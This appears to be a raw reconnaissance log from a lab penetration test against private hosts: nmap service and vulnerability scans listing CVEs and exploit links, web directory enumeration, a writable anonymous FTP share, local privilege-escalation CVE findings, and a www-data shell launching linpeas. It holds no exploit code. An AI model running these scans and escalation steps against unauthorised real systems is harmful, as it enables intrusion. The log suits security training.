No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.54 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 -Pn 192.168.110.80 -oA machines/192_168_110_80/enumeration/nmap/nmap_udp_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:20 CET
Nmap scan report for 192.168.110.80
Host is up.
All 1000 scanned ports on 192.168.110.80 are open|filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds
nikto -h 192.168.110.80:8080
---------------------------------------------------------------------------
+ Target IP: 192.168.110.80
+ Target Hostname: 192.168.110.80
+ Target Port: 8080
+ Start Time: 2022-12-11 07:02:28 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 5cac60653cc22, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7917 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-11 07:02:41 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.110.80:8080 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:04:26 2022
URL_BASE: http://192.168.110.80:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.80:8080/ ----
+ http://192.168.110.80:8080/index.html (CODE:200|SIZE:1964)
-----------------
END_TIME: Sun Dec 11 07:04:29 2022
DOWNLOADED: 9224 - FOUND: 1
nikto -h 192.168.110.80:8443
---------------------------------------------------------------------------
+ Target IP: 192.168.110.80
+ Target Hostname: 192.168.110.80
+ Target Port: 8443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=CH/ST=Switzerland/L=Bern/O=OSSTMM
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /C=CH/ST=Switzerland/L=Bern/O=OSSTMM
+ Start Time: 2022-12-11 07:06:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 5cac60653cc22, mtime: gzip
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '192.168.110.80' does not match certificate's names:
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-12-11 07:06:36 (GMT1) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
sudo nmap 192.168.110.80 -sV -oA 192_168_110_80/enumeration/nmap/vuln --script vuln -T5 -Pn -p22,3306,8080,8443
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.80
Host is up (0.00065s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
|_sslv2-drown:
| vulners:
| MySQL 8.0.26-0ubuntu0.20.04.2:
|_ NODEJS:602 0.0 https://vulners.com/nodejs/NODEJS:602
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.19 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.120 -oA machines/192_168_110_120/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:43 CET
Nmap scan report for 192.168.110.120
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
20021/tcp open ftp vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/19%OT=22%CT=1%CU=33593%PV=Y%DS=2%DC=I%G=Y%TM=6378B3
OS:61%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=
OS:M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7
OS:%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y
OS:%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD
OS:=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.120 -oA machines/192_168_110_120/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:16 CET
Nmap scan report for 192.168.110.120
Host is up (0.00081s latency).
All 1000 scanned ports on 192.168.110.120 are closed (955) or open|filtered (45)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1036.82 seconds
nikto -h 192.168.110.120
---------------------------------------------------------------------------
+ Target IP: 192.168.110.120
+ Target Hostname: 192.168.110.120
+ Target Port: 80
+ Start Time: 2022-12-11 07:08:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-11 07:09:35 (GMT1) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.120 -w /usr/share/wordlists/dirb/common.txt 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.120
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/11 07:10:48 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/index.php (Status: 200) [Size: 6]
/index.html (Status: 200) [Size: 65]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/12/11 07:10:51 Finished
===============================================================
dirb http://192.168.110.120 -X .html,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 07:09:26 2022
URL_BASE: http://192.168.110.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.120/ ----
+ http://192.168.110.120/index.html (CODE:200|SIZE:65)
+ http://192.168.110.120/index.php (CODE:200|SIZE:6)
-----------------
END_TIME: Sun Dec 11 07:09:29 2022
DOWNLOADED: 9224 - FOUND: 3
sudo nmap 192.168.110.120 -sV -oA 192_168_110_120/enumeration/nmap/ftp --script "safe and ftp-*" -T5 -p20021
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:32 CET
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Nmap scan report for 192.168.110.120
Host is up (0.00089s latency).
PORT STATE SERVICE VERSION
20021/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Nov 20 22:19 html [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.120.51
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds
sudo nmap 192.168.110.135 -sV -oA 192_168_110_135/enumeration/nmap/vuln --script vuln -T5 -p22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:08 CET
Nmap scan report for 192.168.110.135
Host is up (0.00039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.41:
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-36160 5.0 https://vulners.com/cve/CVE-2021-36160
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-30641 5.0 https://vulners.com/cve/CVE-2021-30641
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-13950 5.0 https://vulners.com/cve/CVE-2020-13950
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
|_ 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.54 seconds
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
www-data@li204-vmLS5:/var/www/html$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-74-generic (buildd@lgw01-amd64-038) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: li204-vmLS5.smartlearn.lan
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan por ts, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more wit h -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
